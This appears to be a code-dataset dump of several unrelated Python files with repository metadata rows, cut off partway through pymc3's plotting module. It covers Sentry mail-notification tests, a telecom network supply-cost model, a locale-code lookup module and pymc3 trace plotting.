self.assertEquals(kwargs.get('project'), self.project)
self.assertEquals(kwargs.get('reference'), group)
assert kwargs.get('subject') == u'BAR-2 - hello world'
@mock.patch('sentry.plugins.sentry_mail.models.MailPlugin._send_mail')
def test_multiline_error(self, _send_mail):
event_manager = EventManager({
'message': 'hello world\nfoo bar',
'level': 'error',
})
event_manager.normalize()
event_data = event_manager.get_data()
event_type = event_manager.get_event_type()
event_data['type'] = event_type.key
event_data['metadata'] = event_type.get_metadata(event_data)
group = Group(
id=2,
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
message=event_manager.get_search_message(),
logger='root',
short_id=2,
data={
'type': event_type.key,
'metadata': event_type.get_metadata(event_data),
}
)
event = Event(
group=group,
message=group.message,
project=self.project,
datetime=group.last_seen,
data=event_data,
)
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}):
self.plugin.notify(notification)
assert _send_mail.call_count is 1
args, kwargs = _send_mail.call_args
assert kwargs.get('subject') == u'BAR-2 - hello world'
def test_get_sendable_users(self):
from sentry.models import UserOption, User
user = self.create_user(email='foo@example.com', is_active=True)
user2 = self.create_user(email='baz@example.com', is_active=True)
self.create_user(email='baz2@example.com', is_active=True)
# user with inactive account
self.create_user(email='bar@example.com', is_active=False)
# user not in any groups
self.create_user(email='bar2@example.com', is_active=True)
organization = self.create_organization(owner=user)
team = self.create_team(organization=organization)
project = self.create_project(name='Test', teams=[team])
OrganizationMemberTeam.objects.create(
organizationmember=OrganizationMember.objects.get(
user=user,
organization=organization,
),
team=team,
)
self.create_member(user=user2, organization=organization, teams=[team])
# all members
assert (sorted(set([user.pk, user2.pk])) == sorted(self.plugin.get_sendable_users(project)))
# disabled user2
UserOption.objects.create(key='mail:alert', value=0, project=project, user=user2)
assert user2.pk not in self.plugin.get_sendable_users(project)
user4 = User.objects.create(username='baz4', email='bar@example.com', is_active=True)
self.create_member(user=user4, organization=organization, teams=[team])
assert user4.pk in self.plugin.get_sendable_users(project)
# disabled by default user4
uo1 = UserOption.objects.create(
key='subscribe_by_default', value='0', project=project, user=user4
)
assert user4.pk not in self.plugin.get_sendable_users(project)
uo1.delete()
UserOption.objects.create(
key='subscribe_by_default', value=u'0', project=project, user=user4
)
assert user4.pk not in self.plugin.get_sendable_users(project)
def test_notify_users_with_utf8_subject(self):
group = self.create_group(message='Hello world')
event = self.create_event(group=group, message=u'רונית מגן', tags={'level': 'error'})
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}), self.tasks():
self.plugin.notify(notification)
assert len(mail.outbox) == 1
msg = mail.outbox[0]
assert msg.subject == u'[Sentry] BAR-1 - רונית מגן'
def test_get_digest_subject(self):
assert self.plugin.get_digest_subject(
mock.Mock(qualified_short_id='BAR-1'),
{mock.sentinel.group: 3},
datetime(2016, 9, 19, 1, 2, 3, tzinfo=pytz.utc),
) == 'BAR-1 - 1 new alert since Sept. 19, 2016, 1:02 a.m. UTC'
@mock.patch.object(MailPlugin, 'notify', side_effect=MailPlugin.notify, autospec=True)
def test_notify_digest(self, notify):
project = self.event.project
rule = project.rule_set.all()[0]
digest = build_digest(
project,
(
event_to_record(self.create_event(group=self.create_group()), (rule, )),
event_to_record(self.event, (rule, )),
),
)
with self.tasks():
self.plugin.notify_digest(project, digest)
assert notify.call_count is 0
assert len(mail.outbox) == 1
message = mail.outbox[0]
assert 'List-ID' in message.message()
@mock.patch.object(MailPlugin, 'notify', side_effect=MailPlugin.notify, autospec=True)
@mock.patch.object(MessageBuilder, 'send_async', autospec=True)
def test_notify_digest_single_record(self, send_async, notify):
project = self.event.project
rule = project.rule_set.all()[0]
digest = build_digest(
project,
(event_to_record(self.event, (rule, )), ),
)
self.plugin.notify_digest(project, digest)
assert send_async.call_count is 1
assert notify.call_count is 1
@mock.patch(
'sentry.models.ProjectOption.objects.get_value',
Mock(side_effect=lambda p, k, d: "[Example prefix] " if k == "mail:subject_prefix" else d)
)
def test_notify_digest_subject_prefix(self):
project = self.event.project
rule = project.rule_set.all()[0]
digest = build_digest(
project,
(
event_to_record(self.create_event(group=self.create_group()), (rule, )),
event_to_record(self.event, (rule, )),
),
)
with self.tasks():
self.plugin.notify_digest(project, digest)
assert len(mail.outbox) == 1
msg = mail.outbox[0]
assert msg.subject.startswith('[Example prefix]')
def test_assignment(self):
activity = Activity.objects.create(
project=self.project,
group=self.group,
type=Activity.ASSIGNED,
user=self.create_user('foo@example.com'),
data={
'assignee': six.text_type(self.user.id),
'assigneeType': 'user',
},
)
with self.tasks():
self.plugin.notify_about_activity(activity)
assert len(mail.outbox) == 1
msg = mail.outbox[0]
assert msg.subject == 'Re: [Sentry] BAR-1 - \xe3\x81\x93\xe3\x82\x93\xe3\x81\xab\xe3\x81\xa1\xe3\x81\xaf'
assert msg.to == [self.user.email]
def test_assignment_team(self):
activity = Activity.objects.create(
project=self.project,
group=self.group,
type=Activity.ASSIGNED,
user=self.create_user('foo@example.com'),
data={
'assignee': six.text_type(self.project.teams.first().id),
'assigneeType': 'team',
},
)
with self.tasks():
self.plugin.notify_about_activity(activity)
assert len(mail.outbox) == 1
msg = mail.outbox[0]
assert msg.subject == 'Re: [Sentry] BAR-1 - \xe3\x81\x93\xe3\x82\x93\xe3\x81\xab\xe3\x81\xa1\xe3\x81\xaf'
assert msg.to == [self.user.email]
def test_note(self):
user_foo = self.create_user('foo@example.com')
activity = Activity.objects.create(
project=self.project,
group=self.group,
type=Activity.NOTE,
user=user_foo,
data={
'text': 'sup guise',
},
)
self.project.teams.first().organization.member_set.create(user=user_foo)
with self.tasks():
self.plugin.notify_about_activity(activity)
assert len(mail.outbox) >= 1
msg = mail.outbox[-1]
assert msg.subject == 'Re: [Sentry] BAR-1 - \xe3\x81\x93\xe3\x82\x93\xe3\x81\xab\xe3\x81\xa1\xe3\x81\xaf'
assert msg.to == [self.user.email]
def test_notify_with_suspect_commits(self):
release = self.create_release(project=self.project, user=self.user)
group = self.create_group(project=self.project, first_release=release)
event = self.create_event(group=group, tags={'sentry:release': release.version})
notification = Notification(event=event)
with self.tasks(), self.options({'system.url-prefix': 'http://example.com'}), self.feature('organizations:suggested-commits'):
self.plugin.notify(notification)
assert len(mail.outbox) >= 1
msg = mail.outbox[-1]
assert 'Suspect Commits' in msg.body
class MailPluginSignalsTest(TestCase):
@fixture
def plugin(self):
return MailPlugin()
def test_user_feedback(self):
user_foo = self.create_user('foo@example.com')
report = UserReport.objects.create(
project=self.project,
group=self.group,
name='Homer Simpson',
email='homer.simpson@example.com'
)
self.project.teams.first().organization.member_set.create(user=user_foo)
with self.tasks():
self.plugin.handle_signal(
name='user-reports.created',
project=self.project,
payload={
'report': serialize(report, AnonymousUser(), UserReportWithGroupSerializer()),
},
)
assert len(mail.outbox) == 1
msg = mail.outbox[0]
assert msg.subject == u'[Sentry] {} - New Feedback from Homer Simpson'.format(
self.group.qualified_short_id,
)
assert msg.to == [self.user.email]
class ActivityEmailTestCase(TestCase):
def get_fixture_data(self, users):
organization = self.create_organization(owner=self.create_user())
team = self.create_team(organization=organization)
project = self.create_project(organization=organization, teams=[team])
group = self.create_group(project=project)
users = [self.create_user() for _ in range(users)]
for user in users:
self.create_member([team], user=user, organization=organization)
GroupSubscription.objects.subscribe(group, user)
return group, users
def test_get_participants(self):
group, (actor, other) = self.get_fixture_data(2)
email = ActivityEmail(Activity(
project=group.project,
group=group,
user=actor,
))
assert set(email.get_participants()) == set([other])
UserOption.objects.set_value(user=actor, key='self_notifications', value='1')
assert set(email.get_participants()) == set([actor, other])
def test_get_participants_without_actor(self):
group, (user, ) = self.get_fixture_data(1)
email = ActivityEmail(Activity(
project=group.project,
group=group,
))
assert set(email.get_participants()) == set([user])
def test_get_subject(self):
group, (user, ) = self.get_fixture_data(1)
email = ActivityEmail(Activity(
project=group.project,
group=group,
))
with mock.patch('sentry.models.ProjectOption.objects.get_value') as get_value:
get_value.side_effect = lambda project, key, default=None: \
"[Example prefix] " if key == "mail:subject_prefix" else default
assert email.get_subject_with_prefix().startswith('[Example prefix] ')
class MailPluginOwnersTest(TestCase):
@fixture
def plugin(self):
return MailPlugin()
def setUp(self):
from sentry.ownership.grammar import Rule
self.user = self.create_user(email='foo@example.com', is_active=True)
self.user2 = self.create_user(email='baz@example.com', is_active=True)
self.organization = self.create_organization(owner=self.user)
self.team = self.create_team(organization=self.organization)
self.project = self.create_project(name='Test', teams=[self.team])
OrganizationMemberTeam.objects.create(
organizationmember=OrganizationMember.objects.get(
user=self.user,
organization=self.organization,
),
team=self.team,
)
self.create_member(user=self.user2, organization=self.organization, teams=[self.team])
self.group = self.create_group(
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
message='hello world',
logger='root',
)
ProjectOwnership.objects.create(
project_id=self.project.id,
schema=dump_schema([
Rule(Matcher('path', '*.py'), [
Owner('team', self.team.slug),
]),
Rule(Matcher('path', '*.jx'), [
Owner('user', self.user2.email),
]),
Rule(Matcher('path', '*.cbl'), [
Owner('user', self.user.email),
Owner('user', self.user2.email),
])
]),
fallthrough=True,
)
def make_event_data(self, filename, url='http://example.com'):
mgr = EventManager({
'tags': [('level', 'error')],
'stacktrace': {
'frames': [
{
'lineno': 1,
'filename': filename,
},
],
},
'request': {
'url': url
},
})
mgr.normalize()
data = mgr.get_data()
event_type = mgr.get_event_type()
data['type'] = event_type.key
data['metadata'] = event_type.get_metadata(data)
return data
def assert_notify(self, event, emails_sent_to):
mail.outbox = []
with self.options({'system.url-prefix': 'http://example.com'}), self.tasks():
self.plugin.notify(Notification(event=event))
assert len(mail.outbox) == len(emails_sent_to)
assert sorted(email.to[0] for email in mail.outbox) == sorted(emails_sent_to)
def test_get_send_to_with_team_owners(self):
event = Event(
group=self.group,
message=self.group.message,
project=self.project,
datetime=self.group.last_seen,
data=self.make_event_data('foo.py')
)
assert (sorted(set([self.user.pk, self.user2.pk])) == sorted(
self.plugin.get_send_to(self.project, event.data)))
def test_get_send_to_with_user_owners(self):
event = Event(
group=self.group,
message=self.group.message,
project=self.project,
datetime=self.group.last_seen,
data=self.make_event_data('foo.cbl')
)
assert (sorted(set([self.user.pk, self.user2.pk])) == sorted(
self.plugin.get_send_to(self.project, event.data)))
def test_get_send_to_with_user_owner(self):
event = Event(
group=self.group,
message=self.group.message,
project=self.project,
datetime=self.group.last_seen,
data=self.make_event_data('foo.jx')
)
assert (sorted(set([self.user2.pk])) == sorted(
self.plugin.get_send_to(self.project, event.data)))
def test_get_send_to_with_fallthrough(self):
event = Event(
group=self.group,
message=self.group.message,
project=self.project,
datetime=self.group.last_seen,
data=self.make_event_data('foo.jx')
)
assert (sorted(set([self.user2.pk])) == sorted(
self.plugin.get_send_to(self.project, event.data)))
def test_get_send_to_without_fallthrough(self):
ProjectOwnership.objects.get(project_id=self.project.id).update(fallthrough=False)
event = Event(
group=self.group,
message=self.group.message,
project=self.project,
datetime=self.group.last_seen,
data=self.make_event_data('foo.cpp')
)
assert [] == sorted(self.plugin.get_send_to(self.project, event.data))
def test_notify_users_with_owners(self):
event_all_users = Event(
group=self.group,
message=self.group.message,
project=self.project,
datetime=self.group.last_seen,
data=self.make_event_data('foo.cbl'),
)
self.assert_notify(event_all_users, [self.user.email, self.user2.email])
event_team = Event(
group=self.group,
message=self.group.message,
project=self.project,
datetime=self.group.last_seen,
data=self.make_event_data('foo.py'),
)
self.assert_notify(event_team, [self.user.email, self.user2.email])
event_single_user = Event(
group=self.group,
message=self.group.message,
project=self.project,
datetime=self.group.last_seen,
data=self.make_event_data('foo.jx'),
)
self.assert_notify(event_single_user, [self.user2.email])
| 34.60597 | 134 | 0.608169 |
32059d38dc84186bbc0a900fc3c110da6c15d232 | 11,268 | py | Python | src/podis/supply.py | edwardoughton/ictp4d | 0e36b3c4515e57cc9210bd22f2ab761f2aa750d6 | [
"MIT"
] | 4 | 2021-02-07T19:36:57.000Z | 2021-05-20T16:46:02.000Z | src/podis/supply.py | edwardoughton/ictp4d | 0e36b3c4515e57cc9210bd22f2ab761f2aa750d6 | [
"MIT"
] | null | null | null | src/podis/supply.py | edwardoughton/ictp4d | 0e36b3c4515e57cc9210bd22f2ab761f2aa750d6 | [
"MIT"
] | null | null | null | """
Optimize supply
Written by Ed Oughton.
Winter 2020
"""
import math
from itertools import tee
from operator import itemgetter
from podis.costs import find_network_cost
def estimate_supply(country, regions, capacity_lut, option, global_parameters,
country_parameters, costs, core_lut, ci):
"""
For each region, find the least-cost design and estimate
the required investment for for the single network being modeled.
Parameters
----------
country : dict
Country information.
regions : list of dicts
Data for all regions (one dict per region).
capacity_lut : dict
A dictionary containing the lookup capacities.
option : dict
Contains the scenario and strategy. The strategy string controls
the strategy variants being tested in the model and is defined based
on the type of technology generation, core and backhaul, and the
strategy for infrastructure sharing, the number of networks in each
geotype, spectrum and taxation.
global_parameters : dict
All global model parameters.
country_parameters : dict
All country specific parameters.
costs : dict
All equipment costs.
core_lut : dict
Contains the number of existing and required, core and regional assets.
ci : int
Confidence interval.
Returns
-------
regions : list of dicts
Data for all regions (one dict per region).
"""
output_regions = []
for region in regions:
region['mno_site_density'] = find_site_density(region, option,
global_parameters, country_parameters, capacity_lut, ci)
total_sites_required = math.ceil(region['mno_site_density'] *
region['area_km2'])
region = estimate_site_upgrades(
region,
option['strategy'],
total_sites_required,
country_parameters
)
region = estimate_backhaul_upgrades(region, option['strategy'], country_parameters)
region = find_network_cost(
region,
option,
costs,
global_parameters,
country_parameters,
core_lut,
)
region['scenario'] = option['scenario']
region['strategy'] = option['strategy']
region['confidence'] = ci
output_regions.append(region)
return output_regions
def find_site_density(region, option, global_parameters, country_parameters,
capacity_lut, ci):
"""
For a given region, estimate the number of needed sites.
Parameters
----------
region : dicts
Data for a single region.
option : dict
Contains the scenario and strategy. The strategy string controls
the strategy variants being tested in the model and is defined based
on the type of technology generation, core and backhaul, and the
strategy for infrastructure sharing, the number of networks in each
geotype, spectrum and taxation.
global_parameters : dict
All global model parameters.
country_parameters : dict
All country specific parameters.
capacity_lut : dict
A dictionary containing the lookup capacities.
ci : int
Confidence interval.
Return
------
site_density : float
Estimated site density.
"""
demand = region['demand_mbps_km2']
geotype = region['geotype'].split(' ')[0]
ant_type = 'macro'
generation = option['strategy'].split('_')[0]
frequencies = country_parameters['frequencies']
frequencies = frequencies[generation]
ci = str(ci)
unique_densities = set()
capacity = 0
for item in frequencies:
frequency = str(item['frequency'])
bandwidth = str(item['bandwidth'].split('x')[1])
density_capacities = lookup_capacity(
capacity_lut,
geotype,
ant_type,
frequency,
generation,
ci
)
for item in density_capacities:
site_density, capacity = item
unique_densities.add(site_density)
density_lut = []
for density in list(unique_densities):
capacity = 0
for item in frequencies:
frequency = str(item['frequency'])
channels, bandwidth = item['bandwidth'].split('x')
channels, bandwidth = float(channels), float(bandwidth)
if channels == 1: #allocate downlink channel width when using TDD
downlink = float(global_parameters['tdd_dl_to_ul'].split(':')[0])
bandwidth = bandwidth * (downlink / 100)
density_capacities = lookup_capacity(
capacity_lut,
geotype,
ant_type,
frequency,
generation,
ci
)
for density_capacity in density_capacities:
if density_capacity[0] == density:
capacity += density_capacity[1]
density_lut.append((density, capacity))
density_lut = sorted(density_lut, key=lambda tup: tup[0])
max_density, max_capacity = density_lut[-1]
min_density, min_capacity = density_lut[0]
max_capacity = max_capacity * bandwidth
min_capacity = min_capacity * bandwidth
if demand > max_capacity:
return max_density
elif demand < min_capacity:
return min_density
else:
for a, b in pairwise(density_lut):
lower_density, lower_capacity = a
upper_density, upper_capacity = b
lower_capacity = lower_capacity * bandwidth
upper_capacity = upper_capacity * bandwidth
if lower_capacity <= demand < upper_capacity:
site_density = interpolate(
lower_capacity, lower_density,
upper_capacity, upper_density,
demand
)
return site_density
def lookup_capacity(capacity_lut, env, ant_type, frequency,
generation, ci):
"""
Use lookup table to find the combination of spectrum bands
which meets capacity by clutter environment geotype, frequency,
bandwidth, technology generation and site density.
Parameters
----------
capacity_lut : dict
A dictionary containing the lookup capacities.
env : string
The settlement type e.g. urban, suburban or rural.
ant_type : string
The antenna type, such as a macro cell or micro cell.
frequency : string
The frequency band in Megahertz.
generation : string
The cellular generation such as 4G or 5G.
ci : int
Confidence interval.
Returns
-------
site_densities_to_capacities : list of tuples
Returns a list of site density to capacity tuples.
"""
if (env, ant_type, frequency, generation, ci) not in capacity_lut:
raise KeyError("Combination %s not found in lookup table",
(env, ant_type, frequency, generation, ci))
density_capacities = capacity_lut[
(env, ant_type, frequency, generation, ci)
]
return density_capacities
def interpolate(x0, y0, x1, y1, x):
"""
Linear interpolation between two values.
"""
y = (y0 * (x1 - x) + y1 * (x - x0)) / (x1 - x0)
return y
def pairwise(iterable):
"""
Return iterable of 2-tuples in a sliding window.
>>> list(pairwise([1,2,3,4]))
[(1,2),(2,3),(3,4)]
"""
a, b = tee(iterable)
next(b, None)
return zip(a, b)
def estimate_site_upgrades(region, strategy, total_sites_required,
country_parameters):
"""
Estimate the number of greenfield sites and brownfield upgrades for the
single network being modeled.
Parameters
----------
region : dict
Contains all regional data.
strategy : dict
Controls the strategy variants being tested in the model and is
defined based on the type of technology generation, core and
backhaul, and the level of sharing, subsidy, spectrum and tax.
total_sites_required : int
Number of sites needed to meet demand.
country_parameters : dict
All country specific parameters.
Returns
-------
region : dict
Contains all regional data.
"""
generation = strategy.split('_')[0]
geotype = region['geotype'].split(' ')[0]
#get the number of networks in the area
networks = country_parameters['networks']['baseline' + '_' + geotype]
#get the total number of existing sites that the network has (2G-4G)
region['existing_mno_sites'] = (
region['total_estimated_sites'] / networks)
#get the number of existing 4G sites
existing_4G_sites = math.ceil(region['sites_4G'] / networks )
if total_sites_required > region['existing_mno_sites']:
region['new_mno_sites'] = (int(round(total_sites_required -
region['existing_mno_sites'])))
if region['existing_mno_sites'] > 0:
if generation == '4G' and existing_4G_sites > 0 :
region['upgraded_mno_sites'] = (region['existing_mno_sites'] -
existing_4G_sites)
else:
region['upgraded_mno_sites'] = region['existing_mno_sites']
else:
region['upgraded_mno_sites'] = 0
else:
region['new_mno_sites'] = 0
if generation == '4G' and existing_4G_sites > 0 :
to_upgrade = total_sites_required - existing_4G_sites
region['upgraded_mno_sites'] = to_upgrade if to_upgrade >= 0 else 0
else:
region['upgraded_mno_sites'] = total_sites_required
return region
def estimate_backhaul_upgrades(region, strategy, country_parameters):
"""
Estimates the number of backhaul links requiring upgrades for the
single network being modeled.
Parameters
----------
region : dict
Contains all regional data.
strategy : dict
The strategy string controls the strategy variants being tested in the
model and is defined based on the type of technology generation, core
and backhaul, and the level of sharing, subsidy, spectrum and tax.
country_parameters : dict
All country specific parameters.
Returns
-------
region : dict
Contains all regional data.
"""
backhaul = strategy.split('_')[2]
geotype = region['geotype'].split(' ')[0]
networks = country_parameters['networks']['baseline' + '_' + geotype]
all_mno_sites = (region['new_mno_sites'] + region['upgraded_mno_sites']) # networks
if backhaul == 'fiber':
existing_fiber = region['backhaul_fiber'] / networks
if existing_fiber < all_mno_sites:
region['backhaul_new'] = math.ceil(all_mno_sites - existing_fiber)
else:
region['backhaul_new'] = 0
elif backhaul == 'wireless':
existing_backhaul = (region['backhaul_wireless'] +
region['backhaul_fiber']) / networks
if existing_backhaul < all_mno_sites:
region['backhaul_new'] = math.ceil(all_mno_sites - existing_backhaul)
else:
region['backhaul_new'] = 0
return region
| 30.128342 | 91 | 0.627707 |
2615ee2e78efa1c3d3a525d37c7990a0ec2cec7e | 3,957 | py | Python | sagas/nlu/locales.py | samlet/stack | 47db17fd4fdab264032f224dca31a4bb1d19b754 | [
"Apache-2.0"
] | 3 | 2020-01-11T13:55:38.000Z | 2020-08-25T22:34:15.000Z | sagas/nlu/locales.py | samlet/stack | 47db17fd4fdab264032f224dca31a4bb1d19b754 | [
"Apache-2.0"
] | null | null | null | sagas/nlu/locales.py | samlet/stack | 47db17fd4fdab264032f224dca31a4bb1d19b754 | [
"Apache-2.0"
] | 1 | 2021-01-01T05:21:44.000Z | 2021-01-01T05:21:44.000Z | def get_locale(lang):
"""
import sagas.nlu.locales as locales
locales.get_locale('ja')
:param lang:
:return:
"""
from iso639 import languages
aragonese = languages.get(part1=lang)
return aragonese.part3
class LocaleTable(object):
def __init__(self):
self.data = {}
def __getitem__(self, key):
lang, loc = key
return self.data[(lang,loc)]
def __setitem__(self, key, value):
lang, loc = key
self.data[(lang,loc)] = value
class Locales(object):
def __init__(self):
import json_utils
from sagas.conf import resource_json
# t = dd(lambda: dd(unicode))
t=LocaleTable()
t['eng', 'eng'] = 'English'
t['eng', 'ind'] = 'Inggeris'
t['eng', 'zsm'] = 'Inggeris'
t['ind', 'eng'] = 'Indonesian'
t['ind', 'ind'] = 'Bahasa Indonesia'
t['ind', 'zsm'] = 'Bahasa Indonesia'
t['zsm', 'eng'] = 'Malaysian'
t['zsm', 'ind'] = 'Bahasa Malaysia'
t['zsm', 'zsm'] = 'Bahasa Malaysia'
t['msa', 'eng'] = 'Malay'
t["swe", "eng"] = "Swedish"
t["ell", "eng"] = "Greek"
t["cmn", "eng"] = "Chinese (simplified)"
t["qcn", "eng"] = "Chinese (traditional)"
t['eng', 'cmn'] = u'英语'
t['cmn', 'cmn'] = u'汉语'
t['qcn', 'cmn'] = u'漢語'
t['cmn', 'qcn'] = u'汉语'
t['qcn', 'qcn'] = u'漢語'
t['jpn', 'cmn'] = u'日语'
t['jpn', 'qcn'] = u'日语'
t['als', 'eng'] = 'Albanian'
t['arb', 'eng'] = 'Arabic'
t['cat', 'eng'] = 'Catalan'
t['dan', 'eng'] = 'Danish'
t['eus', 'eng'] = 'Basque'
t['fas', 'eng'] = 'Farsi'
t['fin', 'eng'] = 'Finnish'
t['fra', 'eng'] = 'French'
t['glg', 'eng'] = 'Galician'
t['heb', 'eng'] = 'Hebrew'
t['ita', 'eng'] = 'Italian'
t['jpn', 'eng'] = 'Japanese'
t['mkd', 'eng'] = 'Macedonian'
t['nno', 'eng'] = 'Nynorsk'
t['nob', 'eng'] = u'Bokmål'
t['pol', 'eng'] = 'Polish'
t['por', 'eng'] = 'Portuguese'
t['slv', 'eng'] = 'Slovene'
t['spa', 'eng'] = 'Spanish'
t['tha', 'eng'] = 'Thai'
self.table=t
self.iso_map=resource_json('iso-639.json')
self.rev_map = {v: k for k, v in self.iso_map.items()}
def get_def(self, part3):
from iso639 import languages
try:
loc = languages.get(part3=part3)
except KeyError:
loc = None
return loc
def get_code_by_part1(self, lang_part1):
"""
$ python -m sagas.nlu.locales get_code_by_part1 en
:param lang_part1:
:return:
"""
if lang_part1 in self.iso_map:
code=self.iso_map[lang_part1]
return code, self.get_def(code)
return '', None
def get_code_by_part3(self, lang_part3):
if lang_part3 in self.rev_map:
return self.iso_map[lang_part3], self.get_def(lang_part3)
return '', None
def locale(self, lang):
"""
$ python -m sagas.nlu.locales locale 'cmn'
:param lang:
:return:
"""
return self.table[lang, 'eng']
def nltk_locales(self):
"""
$ python -m sagas.nlu.locales nltk_locales
:return:
"""
from nltk.corpus import wordnet as wn
from iso639 import languages
import sagas
langs = wn.langs()
print(len(langs), sorted(langs))
rs = []
excepts = ['qcn']
for lang in langs:
if lang not in excepts:
loc = languages.get(part3=lang)
rs.append((loc.part3, loc.macro, loc.name))
df=sagas.to_df(rs, ['code', 'micro', 'name'])
sagas.print_df(df)
iso_locales=Locales()
def is_available(lang):
return lang in iso_locales.iso_map
if __name__ == '__main__':
import fire
fire.Fire(Locales)
| 28.467626 | 69 | 0.504423 |
7d4f1d3338a26437609408533209b6e613b519e7 | 16,820 | py | Python | pymc3/plots.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | 1 | 2020-09-29T12:32:32.000Z | 2020-09-29T12:32:32.000Z | pymc3/plots.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | pymc3/plots.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from scipy.stats import kde
from .stats import *
from numpy.linalg import LinAlgError
__all__ = ['traceplot', 'kdeplot', 'kde2plot', 'forestplot', 'autocorrplot']
def traceplot(trace, vars=None, figsize=None,
lines=None, combined=False, grid=True,
alpha=0.35, ax=None):
"""Plot samples histograms and values
Parameters
----------
trace : result of MCMC run
vars : list of variable names
Variables to be plotted, if None all variable are plotted
figsize : figure size tuple
If None, size is (12, num of variables * 2) inch
lines : dict
Dictionary of variable name / value to be overplotted as vertical
lines to the posteriors and horizontal lines on sample values
e.g. mean of posteriors, true values of a simulation
combined : bool
Flag for combining multiple chains into a single chain. If False
(default), chains will be plotted separately.
grid : bool
Flag for adding gridlines to histogram. Defaults to True.
ax : axes
Matplotlib axes. Defaults to None.
Returns
-------
ax : matplotlib axes
"""
import matplotlib.pyplot as plt
if vars is None:
vars = trace.varnames
n = len(vars)
if figsize is None:
figsize = (12, n*2)
if ax is None:
fig, ax = plt.subplots(n, 2, squeeze=False, figsize=figsize)
elif ax.shape != (n,2):
print('traceplot requires n*2 subplots')
return None
for i, v in enumerate(vars):
for d in trace.get_values(v, combine=combined, squeeze=False):
d = np.squeeze(d)
d = make_2d(d)
if d.dtype.kind == 'i':
histplot_op(ax[i, 0], d, alpha=alpha)
else:
kdeplot_op(ax[i, 0], d)
ax[i, 0].set_title(str(v))
ax[i, 0].grid(grid)
ax[i, 1].set_title(str(v))
ax[i, 1].plot(d, alpha=alpha)
ax[i, 0].set_ylabel("Frequency")
ax[i, 1].set_ylabel("Sample value")
if lines:
try:
ax[i, 0].axvline(x=lines[v], color="r", lw=1.5)
ax[i, 1].axhline(y=lines[v], color="r", lw=1.5, alpha=alpha)
except KeyError:
pass
plt.tight_layout()
return ax
def histplot_op(ax, data, alpha=.35):
for i in range(data.shape[1]):
d = data[:, i]
mind = np.min(d)
maxd = np.max(d)
step = max((maxd-mind)//100, 1)
ax.hist(d, bins=range(mind, maxd + 2, step), alpha=alpha, align='left')
ax.set_xlim(mind - .5, maxd + .5)
def kdeplot_op(ax, data):
errored = []
for i in range(data.shape[1]):
d = data[:, i]
try:
density = kde.gaussian_kde(d)
l = np.min(d)
u = np.max(d)
x = np.linspace(0, 1, 100) * (u - l) + l
ax.plot(x, density(x))
except LinAlgError:
errored.append(i)
if errored:
ax.text(.27,.47, 'WARNING: KDE plot failed for: ' + str(errored), style='italic',
bbox={'facecolor':'red', 'alpha':0.5, 'pad':10})
def make_2d(a):
"""Ravel the dimensions after the first.
"""
a = np.atleast_2d(a.T).T
#flatten out dimensions beyond the first
n = a.shape[0]
newshape = np.product(a.shape[1:]).astype(int)
a = a.reshape((n, newshape), order='F')
return a
def kde2plot_op(ax, x, y, grid=200):
xmin = x.min()
xmax = x.max()
ymin = y.min()
ymax = y.max()
grid = grid * 1j
X, Y = np.mgrid[xmin:xmax:grid, ymin:ymax:grid]
positions = np.vstack([X.ravel(), Y.ravel()])
values = np.vstack([x, y])
kernel = kde.gaussian_kde(values)
Z = np.reshape(kernel(positions).T, X.shape)
ax.imshow(np.rot90(Z), cmap=plt.cm.gist_earth_r,
extent=[xmin, xmax, ymin, ymax])
def kdeplot(data, ax=None):
if ax is None:
f, ax = subplots(1, 1, squeeze=True)
kdeplot_op(ax, data)
return ax
def kde2plot(x, y, grid=200, ax=None):
if ax is None:
f, ax = subplots(1, 1, squeeze=True)
kde2plot_op(ax, x, y, grid)
return ax
def autocorrplot(trace, vars=None, max_lag=100, burn=0, ax=None,
symmetric_plot=False):
"""Bar plot of the autocorrelation function for a trace
Parameters
----------
trace : result of MCMC run
vars : list of variable names
Variables to be plotted, if None all variable are plotted.
Vector-value stochastics are handled automatically.
max_lag : int
Maximum lag to calculate autocorrelation. Defaults to 100.
burn : int
Number of samples to discard from the beginning of the trace.
Defaults to 0.
ax : axes
Matplotlib axes. Defaults to None.
symmetric_plot : boolean
Plot from either [0, +lag] or [-lag, lag]. Defaults to False, [-, +lag].
Returns
-------
ax : matplotlib axes
"""
import matplotlib.pyplot as plt
def _handle_array_varnames(val):
if trace[0][val].__class__ is np.ndarray:
k = trace[val].shape[1]
for i in xrange(k):
yield val + '_{0}'.format(i)
else:
yield val
if vars is None:
vars = [item for sub in [[i for i in _handle_array_varnames(var)]
for var in trace.varnames] for item in sub]
else:
vars = [str(var) for var in vars]
vars = [item for sub in [[i for i in _handle_array_varnames(var)]
for var in vars] for item in sub]
chains = trace.nchains
fig, ax = plt.subplots(len(vars), chains, squeeze=False,
sharex=True, sharey=True)
max_lag = min(len(trace) - 1, max_lag)
for i, v in enumerate(vars):
for j in range(chains):
try:
d = np.squeeze(trace.get_values(v, chains=[j], burn=burn,
combine=False))
except KeyError:
k = int(v.split('_')[-1])
v_use = '_'.join(v.split('_')[:-1])
d = np.squeeze(trace.get_values(v_use, chains=[j], burn=burn,
combine=False)[:, k])
ax[i, j].acorr(d, detrend=plt.mlab.detrend_mean, maxlags=max_lag)
if not j:
ax[i, j].set_ylabel("correlation")
if i == len(vars) - 1:
ax[i, j].set_xlabel("lag")
ax[i, j].set_title(v)
if not symmetric_plot:
ax[i, j].set_xlim(0, max_lag)
if chains > 1:
ax[i, j].set_title("chain {0}".format(j+1))
return (fig, ax)
def var_str(name, shape):
"""Return a sequence of strings naming the element of the tallyable object.
This is a support function for forestplot.
:Example:
>>> var_str('theta', (4,))
['theta[1]', 'theta[2]', 'theta[3]', 'theta[4]']
"""
size = np.prod(shape)
ind = (np.indices(shape) + 1).reshape(-1, size)
names = ['[' + ','.join(map(str, i)) + ']' for i in zip(*ind)]
# if len(name)>12:
# name = '\n'.join(name.split('_'))
# name += '\n'
names[0] = '%s %s' % (name, names[0])
return names
def forestplot(trace_obj, vars=None, alpha=0.05, quartiles=True, rhat=True,
